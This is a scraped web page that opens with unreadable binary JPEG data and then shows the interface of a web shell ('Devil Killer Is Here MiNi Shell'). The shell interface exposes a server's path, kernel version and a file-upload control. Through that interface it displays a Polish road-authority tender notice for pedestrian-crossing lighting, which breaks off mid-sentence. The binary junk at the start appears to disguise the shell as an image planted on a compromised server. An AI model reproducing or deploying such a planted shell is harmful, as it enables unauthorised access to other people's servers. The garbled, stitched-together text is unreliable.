JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240314/0024485901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa brd na przejściach dla pieszych na dr.kraj. Oddz. w Z.Górze I: DK27 Olbrachtów itd. II: DK29 Cybinka, III: DK32 Dzikowo itd, IV: DK92 Boczów itd V: DK92 Poźrzadło itd.VI: DK12 Bobrzany </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Zielonej Górze</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział w Zielonej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01751157500090</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohaterów Westerplatte, 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-950</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat_zga@gddkia.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gddkia.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami krajowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa brd na przejściach dla pieszych na dr.kraj. Oddz. w Z.Górze I: DK27 Olbrachtów itd. II: DK29 Cybinka, III: DK32 Dzikowo itd, IV: DK92 Boczów itd V: DK92 Poźrzadło itd.VI: DK12 Bobrzany </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e03050b-e06a-11ee-9fce-3adbe5eb3a3d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00244859</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00224643/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Poprawa BRD na przejściach dla pieszych na dr. kraj. O/Zielona Góra. Części: 1-DK27-Olbrachtów, itd. 2-DK29-Cybinka. 3-DK32-Dzikowo, itd. 4-DK92-Boczów, itd. 5-DK92-Poźrzadło, itd. 6-DK12-Bobrzany</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gddkia.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gddkia.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Niezbędne wymagania sprzętowoaplikacyjne<br/>umożliwiające pracę na Platformie: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 4/1<br/>Mb/s; komputer klasy PC lub lub Mac, o następującej konfiguracji: pamięć RAM min. 8 GB, procesor dwurdzeniowy o taktowaniu min.<br/>2,4GHz, jeden z systemów operacyjnych: MS Windows, Mac OS, Linux, z aktualnym wsparciem technicznym producenta<br/>(sugerowanenie starsze niż 3 lata od daty wszczęcia postępowania) zainstalowana dowolna wersja przeglądarki internetowej –<br/>sugerowane najnowsze wersje: Chrome, Safari, Edge, Firefox, Opera.  włączona obsługa JavaScript; zainstalowany program<br/>obsługujący stosowane przez Wykonawcę formaty plików (np. Acrobat Reader dla plików w formacie „pdf”).2. Zamawiający<br/>dopuszcza przesyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa tj. m.in.: .doc, .docx,.txt, .xls, .xlsx, .ppt,<br/>.csv, .pdf, .jpg, .git, .png, .tif, .dwg, .ath, .kst, .zip, przy czym Zamawiający zaleca wykorzystywanie plików wformacie .pdf.<br/>Maksymalny rozmiar pojedynczego pliku to 250 MB, a w przypadku dokumentów podpisanych podpisem zaufanym do10 MB, przy<br/>czym nie określa się limitu liczby plików.3. Informacja na temat kodowania i czasu odbioru danych: pliki Oferty załączone przez<br/>Wykonawcę na Platformie i zapisane, widoczne są w Platformie jako zaszyfrowane. Możliwośćotworzenia pliku dostępna jest<br/>dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert; oznaczenie czasu odbioru danych przez<br/>Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas(hh:mm:ss), znajdującą się po lewej stronie<br/>dokumentu w kolumnie „Data przesłania”.4. Dokumentacja przedmiotowego postępowania dostępna jest na Platformie w zakładce<br/>„Załączniki organizatora”. Pobraniedokumentu następuje po kliknięciu na wybrany załącznik i wciśnięciu polecenia „Pobierz”. W celu<br/>pobrania wszystkich załącznikówjednocześnie należy wybrać polecenie „Pobierz paczkę”, a następnie „Pobierz wszystkie załączniki<br/>organizatora”.5. Dokumenty, oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie,<br/>według Instrukcjikorzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce „Pomoc” –<br/>„Instrukcje”.Pytania/wnioski o wyjaśnienie treści SWZ/odwołania składane są przy użyciu zakładki „Pytania/informacje”,<br/>polecenie„Nowe/wysłane” i następnie „Dodaj pytanie/ komentarz”.W trakcie etapu składania ofert, oferta, oświadczenie, o którym<br/>mowa w pkt 10.2. IDW, zobowiązanie, o którym mowa w pkt 11.3.IDW, dokumenty elektroniczne, oświadczenia lub elektroniczne<br/>kopie dokumentów lub oświadczeń składające się na ofertę,składane są przez Wykonawcę przy użyciu zakładki „Złóż ofertę”<br/>polecenie „Dodaj załącznik”.Po złożeniu ofert, dokumenty elektroniczne, oświadczenia, uzupełnienia, wyjaśnienia, elektroniczne<br/>kopie dokumentów luboświadczeń przedstawiane przez Wykonawcę na wezwanie Zamawiającego, składane są przy użyciu zakładki<br/>„Pytania/informacje”polecenie „Nowe/wysłane” i następnie „Dodaj pytanie/ komentarz” albo jako korespondencja w wątku polecenie<br/>„Otrzymane” inastępnie „Odpowiedz”.6. W przypadku przekazywania w postępowaniu dokumentu elektronicznego w formacie<br/>poddającym dane kompresji, opatrzeniepliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisemosobistym jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku<br/>podpisem kwalifikowanym, podpisemzaufanym lub podpisem osobistym.7. Pozostałe informacje w pkt 14 IDW.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że Administratorem danych osobowych Wykonawcy<br/>jestGeneralny Dyrektor Dróg Krajowych i Autostrad, ul. Wronia 53, 00-874 Warszawa, tel. (022) 375 88 88, e-mail:kancelaria@gddkia.gov.pl.2. W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z<br/>Inspektorem Ochrony Danych, zapośrednictwem adresu e-mail: iod@gddkia.gov.pl.3. Dane osobowe będą przetwarzane w celu<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz w celuarchiwizacji.4. Podstawę prawną przetwarzania<br/>danych osobowych stanowi ustawa Prawo zamówień publicznych, wydane na jej podstawie aktywykonawcze, a także ustawa o<br/>narodowym zasobie archiwalnym i archiwach.5. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym z<br/>uwzględnieniem przepisów w zakresiezamówień publicznych, a także podmiotom przetwarzającym dane na podstawie zawartych<br/>umów.6. Dane osobowe Wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5 lat, albo 15 lat w<br/>przypadkuzamówień współfinansowanych ze środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po<br/>zakończeniuokresu obowiązywania umowy. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane,<br/>jakonajkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).7. Osobie, której dane dotyczą przysługuje prawo:- dostępu do<br/>danych. W przypadku, gdy wykonanie obowiązku związanego z prawem dostępu do danych wymagałobyniewspółmiernie dużego<br/>wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacjimających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówieniapublicznego;- sprostowania<br/>danych, ich usunięcia oraz ograniczenia przetwarzania na warunkach określonych w przepisach RozporządzeniaParlamentu i Rady<br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniemdanych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE. Żądanie sprostowaniadanych nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawiezamówienia<br/>publicznego w zakresie niezgodnym z przepisami. Żądanie sprostowania danych nie może skutkować zmianą wynikupostępowania o<br/>udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnymz przepisami.<br/>Wystąpienie z żądaniem ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do czasuzakończenia<br/>postępowania o udzielenie zamówienia publicznego; - wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8.<br/>Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny<br/>spełnianiawarunków udziału w postępowaniu oraz zdolności wykonawcy do należytego wykonania zamówienia, co skutkować<br/>możewykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O/ZG.D-3.2411.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: Poprawa brd na przejściach dla pieszych na DK27 w m. Olbrachtów, Żary, Bieniów, Włostów:<br/>W zakresie zamówienia: <br/>1)	Poprawa BRD na przejściach dla pieszych na DK27 w m. Olbrachtów: <br/>a) w km 18+132 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej; <br/>b) w km 18+645 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej; <br/>2) Poprawa BRD na przejściach dla pieszych na DK27 w m. Żary:<br/>a) w km 20+175 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej ul. Zgorzelecka;<br/>b) w km 20+399 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej ul. Zgorzelecka; <br/>3) Poprawa BRD na przejściach dla pieszych na DK27 w m. Bieniów:<br/>a) w obrębie skrzyżowania (km 30+224, 30+253) obejmuje budowę:<br/>•	w km 30+224 <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej, ul. Zielonogórska; <br/>• w km 30+253 <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej, ul. Zielonogórska; <br/>4)	Poprawa BRD na przejściach dla pieszych na DK27 w m. Włostów:<br/>a) w km 33+069 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej;<br/>b) w km 33+232 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej;<br/>- korekta przejścia dla pieszych, z uwagi na lokalizację przejścia na wjeździe na drogę wewnętrzną; <br/> - drogi dla pieszych / strefy oczekiwania przed przejściem dla pieszych o długości ok. 4 m i szer. 2 m; <br/>c) w km 33+562 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria<br/>oceny ofert: Cena - 60 % = 60 pkt, Okres gwarancji - 20 % = 20 pkt, Doświadczenie Kierownika zadania - 20 % = 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: Poprawa brd na przejściach dla pieszych na DK29 w m. Cybinka:<br/>W zakresie zamówienia: <br/>2)	Poprawa BRD na przejściach dla pieszych na DK29 w m. Cybinka: <br/>a) w km 24+010 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej - ul. Słubicka; <br/>b) w km 24+220 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej, droga gminna 100358F, ul. Kościelna; <br/>c)	w km 24+330 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych i przejazdu rowerzystów, wlot drogi podporządkowanej, droga gminna 100307F, ul. Krakowska; <br/>d)	w obrębie skrzyżowania (km 24+515) obejmuje budowę: <br/>•	w km 24+515 – strona lewa,<br/> - dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej- droga gminna 100326F, ul. Szkolna; <br/>•	w km 24+515 - strona prawa,<br/> - dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej- droga gminna 100326F, ul. Szkolna; <br/>e)	w obrębie skrzyżowania (km 24+810 - ul. Słubicka, ul. Krośnieńska) obejmuje budowę: <br/>•	w km 24+810 – strona lewa,<br/> - dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej droga powiatowa nr 1249F, ul. Jana Henryka Dąbrowskiego; <br/>•	w km 24+810 - strona prawa,<br/>- dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej droga powiatowa nr 1248F, ul. Tadeusza Kościuszki; <br/>f)	w obrębie skrzyżowania (km 25+160, 25+185) obejmuje budowę: <br/>•	w km 25+160 <br/> - dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej - ul. Krośnieńska; <br/>•	w km 25+185<br/> - dedykowanego oświetlenia przejścia dla pieszych, wlot drogi podporządkowanej droga gminna 100315F, ul. 1 Maja; <br/>g) w km 25+630 obejmuje budowę:<br/> - dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej - ul. Krośnieńska; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria<br/>oceny ofert: Cena - 60 % = 60 pkt, Okres gwarancji - 20 % = 20 pkt, Doświadczenie Kierownika zadania - 20 % = 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III: Poprawa brd na przejściach dla pieszych na DK32 w m. Dzikowo:<br/>W zakresie zamówienia: <br/>3)	Poprawa BRD na przejściu dla pieszych na DK32 w m. Dzikowo: <br/>a) w km 14+863 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi głównej; <br/>2) Poprawa BRD na przejściach dla pieszych na DK32 w m. Brzózka:<br/>a) w km 26+298 obejmuje budowę: <br/> - dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej DK32; <br/>a)	w km 26+459 obejmuje budowę:<br/>- dedykowanego oświetlenia przejścia dla pieszych w ciągu drogi głównej DK32; <br/>3) Poprawa BRD na przejściach dla pieszych na DK32 w m. Dąbie:<br/>a) w km 36+552 obejmuje budowę: <br/>- dedykowanego oświetlenia przejścia dla pieszych, w ciągu drogi 